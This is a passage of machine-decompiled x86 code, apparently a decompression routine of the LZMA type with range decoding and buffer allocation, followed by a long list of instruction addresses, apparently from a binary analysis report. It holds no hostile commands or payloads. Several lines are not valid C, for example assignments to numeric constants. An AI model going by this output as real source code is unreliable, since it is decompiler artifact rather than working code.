										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4)); // executed
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406956
0x00406956
0x0040695b
0x004069d2
0x004069d9
0x004069e3
0x00406fc2
0x00406fc2
0x00406fc5
0x00406fc5
0x00406fcb
0x00406fd1
0x00406fd7
0x00406ff1
0x00406ff4
0x00406ffa
0x00407005
0x00407007
0x00406fd9
0x00406fd9
0x00406fe8
0x00406fec
0x00406fec
0x00407011
0x00407038
0x00407038
0x0040703e
0x0040703e
0x00000000
0x00407013
0x00407013
0x00407017
0x004071c6
0x00000000
0x004071c6
0x00407023
0x0040702a
0x00407032
0x00407035
0x00000000
0x00407035
0x0040695d
0x0040695d
0x00406961
0x00406969
0x0040696c
0x0040696e
0x00406971
0x00406973
0x00406978
0x0040697b
0x00406982
0x00406989
0x0040698c
0x00406997
0x0040699f
0x0040699f
0x00406999
0x00406999
0x00406999
0x0040698e
0x0040698e
0x0040698e
0x004069a6
0x004069c4
0x004069c6
0x00406b99
0x00406b99
0x00406b9c
0x00406b9f
0x00406ba2
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb7
0x00406bcf
0x00406bd2
0x00406bd5
0x00406bd8
0x00406bd8
0x00406bdb
0x00406be1
0x00406bb9
0x00406bb9
0x00406bc1
0x00406bc6
0x00406bc8
0x00406bca
0x00406bca
0x00406beb
0x00406bee
0x00406b91
0x00406b97
0x00000000
0x00000000
0x00000000
0x00406bf0
0x00406b6c
0x00406b70
0x00407178
0x00000000
0x00407178
0x00406b76
0x00406b79
0x00406b7c
0x00406b80
0x00406b83
0x00406b89
0x00406b8b
0x00406b8b
0x00406b8e
0x00000000
0x00406b8e
0x004069a8
0x004069a8
0x004069ab
0x004069b1
0x004069b3
0x004069b3
0x004069b6
0x004069b9
0x004069bb
0x004069bc
0x004069bf
0x00406a2c
0x00406a2c
0x00406a30
0x00406a33
0x00406a36
0x00406a39
0x00406a3c
0x00406a3d
0x00406a40
0x00406a42
0x00406a48
0x00406a4b
0x00406a4e
0x00406a51
0x00406a54
0x00406a5a
0x00406a76
0x00406a79
0x00406a7c
0x00406a7f
0x00406a86
0x00406a8c
0x00406a90
0x00406a5c
0x00406a5c
0x00406a60
0x00406a68
0x00406a6d
0x00406a6f
0x00406a71
0x00406a71
0x00406a9a
0x00406a9d
0x00406a14
0x00406a14
0x00406a1a
0x00406acd
0x00406ad3
0x00000000
0x00000000
0x00406ad5
0x00406ad8
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae7
0x00406aea
0x00406aed
0x00406af3
0x00406b0b
0x00406b0e
0x00406b11
0x00406b14
0x00406b14
0x00406b17
0x00406b1d
0x00406af5
0x00406af5
0x00406afd
0x00406b02
0x00406b04
0x00406b06
0x00406b06
0x00406b27
0x00406b2a
0x00406aa8
0x00406aac
0x0040716c
0x00000000
0x0040716c
0x00406ab2
0x00406ab5
0x00406ab8
0x00406abc
0x00406abf
0x00406ac5
0x00406ac7
0x00406ac7
0x00406aca
0x00406aca
0x00406b2a
0x00406b31
0x00406b31
0x00406b31
0x00406b35
0x00406b35
0x00406b38
0x00406b3b
0x00406b3f
0x00407184
0x00000000
0x00407184
0x00406b45
0x00406b48
0x00406b4b
0x00406b4e
0x00406b51
0x00406b54
0x00406b57
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b64
0x00406b64
0x00406b64
0x00406d01
0x00406d01
0x00406d04
0x00406d04
0x00000000
0x00406d04
0x00406a26
0x00000000
0x00000000
0x00000000
0x00406aa3
0x004069ef
0x004069f3
0x00407160
0x004071dc
0x004071e4
0x004071eb
0x004071ed
0x004071f4
0x004071f8
0x004071f8
0x004069f9
0x004069fc
0x004069ff
0x00406a03
0x00406a06
0x00406a0c
0x00406a0e
0x00406a0e
0x00406a11
0x00000000
0x00406a11
0x00406a9d
0x004069a6
0x004067da
0x004067da
0x004067e3
0x004071f1
0x004071f1
0x00000000
0x004071f1
0x004067e9
0x00000000
0x004067f4
0x00000000
0x00000000
0x004067fd
0x00406800
0x00406803
0x00406807
0x00000000
0x00000000
0x0040680d
0x00406810
0x00406812
0x00406813
0x00406816
0x00406818
0x00406819
0x0040681b
0x0040681e
0x00406823
0x00406828
0x00406831
0x00406844
0x00406847
0x00406853
0x0040687b
0x0040687d
0x0040688b
0x0040688b
0x0040688f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040687f
0x0040687f
0x00406882
0x00406883
0x00406883
0x00000000
0x0040687f
0x00406859
0x0040685e
0x0040685e
0x00406867
0x0040686f
0x00406872
0x00000000
0x00406878
0x00406878
0x00000000
0x00406878
0x00000000
0x00406895
0x00406895
0x00406899
0x00407145
0x00000000
0x00407145
0x004068a2
0x004068b2
0x004068b5
0x004068b8
0x004068b8
0x004068b8
